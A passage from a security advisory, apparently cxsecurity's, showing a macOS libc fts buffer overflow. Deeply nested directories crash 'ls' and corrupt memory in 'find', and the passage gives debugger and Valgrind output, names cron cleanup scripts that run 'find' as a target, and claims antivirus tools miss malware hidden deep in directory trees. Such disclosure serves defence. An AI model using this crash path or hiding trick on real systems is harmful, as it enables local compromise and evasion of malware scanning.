0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742 \nrbp = 0x00007fff5fbfe710 \nrsp = 0x00007fff5fbfe710 \n.. \nrip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \n.. \n(lldb) bt \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \n* frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nframe #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713 \nframe #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669 \nframe #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596 \nframe #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80 \nframe #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128 \nframe #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564 \nframe #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421 \nframe #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300 \nframe #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1 \n \n=== Time for Valgrind ============= \n \nB/B/B/B/B/../B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/ \nB/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n==1009== Invalid write of size 1 \n==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001DAD: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? \n==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd \n==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001B92: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? \n==1009== \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/ \nB/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \n==1009== Invalid read of size 1 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd \n==1009== \n==1009== \n==1009== Process terminating with default action of signal 11 (SIGSEGV) \n==1009== Access not within mapped region at address 0x102D20318 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== If you believe this happened as a result of a stack \n==1009== overflow in your program's main thread (unlikely but \n==1009== possible), you can try to increase the size of the \n==1009== main thread stack using the --main-stacksize= flag. \n==1009== The main thread stack size used in this run was 8388608. \n==1009== \n==1009== HEAP SUMMARY: \n==1009== in use at exit: 1,671,999 bytes in 6,025 blocks \n==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated \n==1009== \n==1009== LEAK SUMMARY: \n==1009== definitely lost: 519 bytes in 6 blocks \n==1009== indirectly lost: 104 bytes in 6 blocks \n==1009== possibly lost: 0 bytes in 0 blocks \n==1009== still reachable: 1,645,151 bytes in 5,819 blocks \n==1009== suppressed: 26,225 bytes in 194 blocks \n==1009== Rerun with --leak-check=full to see details of leaked memory \n==1009== \n==1009== For counts of detected and suppressed errors, rerun with: -v \n==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) \nSegmentation fault: 11 \nMacMini:SCANME cxsecurity$ \n \n \nIt looks like a buffer overflow in memmove(). Code \n \nhttp://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c \n \n \nThe same issue for 'find' which may be used in cron scripts like \n \n \n./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print \n./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print \n./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days \n./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1; \n \n \nLet's see valgrind output. \n \n \nMacMini:SCANME cxsecurity$ valgrind find . -name \"R\" \n==1055== Memcheck, a memory error detector \n==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. \n==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info \n==1055== Command: find . -name R \n==1055== \nfind: ./.Trashes: Permission denied \n==1055== Invalid write of size 2 \n==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd \n==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n.. \n \nInvalid memory write without crashing. \n \n \nBTW: \nMany vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. Eset32, Kaspersky etc. \n \n====== References =================================== \nhttps://cxsecurity.com/issue/WLB-2014040027 \nhttps://cxsecurity.com/cveshow/CVE-2014-4433/ \nhttps://cxsecurity.com/cveshow/CVE-2014-4434/ \nhttps://cxsecurity.com/issue/WLB-2013110059 \nhttps://cxsecurity.com/cveshow/CVE-2013-6799/ \nhttps://cxsecurity.com/issue/WLB-2010040284 \nhttps://cxsecurity.com/cveshow/CVE-2010-0105/ \nhttps://cxsecurity.com/issue/WLB-2005090063 \n \n \n====== Thanks =================================== \nKacper and Smash_ from DEVILTEAM for technical support. \n \n \n====== Credit =================================== \nMaksymilian Arciemowicz from cxsecurity.com \n \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \nhttp://cifrex.org/ \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134090/macosxfts-overflow.txt"}]}